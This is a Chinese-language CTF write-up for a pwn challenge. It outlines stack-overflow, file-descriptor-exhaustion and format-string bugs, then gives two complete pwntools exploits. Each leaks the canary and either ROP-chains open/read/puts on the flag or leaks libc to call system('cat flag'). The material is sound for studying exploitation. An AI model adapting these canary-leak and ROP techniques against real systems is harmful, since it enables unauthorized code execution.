保护
保护还挺多
main函数
bored函数
fmt函数
secret函数
stack函数
主要漏洞点:
- stack函数有栈溢出,还有puts函数可以泄漏栈的东西
- secret函数由于每个用户能打开的文件数是一定的,函数没有fclose ,一直开 最后读进去的就是空的,所以可以绕过memcmp函数去执行qmemcpy函数达到栈溢出
读写函数细节
类似的题有pwnable.kr的otp (后面做到的时候可以再回顾一下)
- fmt函数有2字节的格式化字符串漏洞
- bored函数可以控制secret栈溢出时的payload,带有一个递归功能
利用方式:
1.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,然后利用bored和secret函数来rop : open('./flag',0) --> read(0,bss,0x200) --> puts(bss)
2.利用bored函数递归几次改变栈结构再利用stack函数泄漏出canary,再用fmt函数泄漏libc得到system地址,然后利用bored和secret函数栈溢出执行 : system('cat flag')
exp1:
from pwn import *
#context.log_level = 'debug'
p = process('./pwn.')
elf = ELF('./pwn.')
def stack(payload):
p.sendlineafter('option:','1')
p.sendafter('once..\n',payload)
def secret(payload):
p.sendlineafter('option:','9011')
p.sendafter('code:',payload)
def fsb(payload):
p.sendlineafter('option:','3')
p.sendafter('think?)\n',payload)
def bored(payload,choice = 'n'):
p.sendafter('bored...\n',payload)
p.sendafter('y/n\n',choice)
#leak canary
p.sendlineafter('option:','2')
for i in range(4):
bored('a')
bored('a','y')
stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)
#open('./flag',0) --> read(0,0x602068,0x200) --> puts(0x602068)
'''
open函数返回的文件描述符fd一定是未使用的最小的文件描述符。
#利用这个特性,可以改变0,1,2这三个文件描述符所指向的文件,由于进程默认会打开0,1,2这三个文件描述符,而且指向了键盘和显示器的设备文件。
如果在open之前先进行close(0),然后再调用open函数就会返回最小的未使用的fd,也就是0。
如果没有就是3
'''
open_plt = elf.plt['open']
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
pop_rdi = 0x0000000000400c53
pop_rsi_r15 = 0x0000000000400c51
payload = './flag\0\0' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(open_plt) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x602068) + p64(0)
payload += p64(read_plt) + p64(pop_rdi) + p64(0x602068) + p64(puts_plt)
p.sendlineafter('option:','2')
bored(payload,'y')
#gdb.attach(p)
try:
for i in range(9999):
secret('\0')
except Exception as e:
p.close()
p.interactive()
exp2:
from pwn import *
#context.log_level = 'debug'
p = process('./pwn.')
elf = ELF('./pwn.')
def stack(payload):
p.sendlineafter('option:','1')
p.sendafter('once..\n',payload)
def secret(payload):
p.sendlineafter('option:','9011')
p.sendafter('code:',payload)
def fsb(payload):
p.sendlineafter('option:','3')
p.sendafter('think?)\n',payload)
def bored(payload,choice = 'n'):
p.sendafter('bored...\n',payload)
p.sendafter('y/n\n',choice)
#leak canary
p.sendlineafter('option:','2')
for i in range(4):
bored('a')
bored('a','y')
stack('a'*0xa8 + 'a')
p.recv(0xa9)
canary = u64(p.recv(7).rjust(8,'\x00'))
log.success('canary : 0x%x' %canary)
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
offset_onegadge = 0xf1147
pop_rdi = 0x0000000000400c53
#leak libc
fsb('%a')
p.recvuntil('0x0.0')
libc_base = int(p.recvuntil('p-',drop = True),16) - 0x3c56a3
log.success('libc base addr : 0x%x' %libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x' %system_addr)
log.success('binsh addr : 0x%x' %binsh_addr)
#cat flag
payload = 'cat flag' + p64(canary) + 'a'*0x8
payload += p64(pop_rdi) + p64(0x602080) + p64(system_addr)
p.sendlineafter('option:','2')
bored(payload,'y')
#gdb.attach(p)
try:
for i in range(9999):
secret('\0')
except Exception as e:
p.close()
p.interactive()
这里用
find .|xargs grep -ri 'define O_RDONLY' #去看了下open函数的参数flags的意思
------------------------------------------------------
/* File access modes for `open' and `fcntl'. */
#define O_RDONLY 0 /* Open read-only. */
#define O_WRONLY 1 /* Open write-only. */
#define O_RDWR 2 /* Open read/write. */
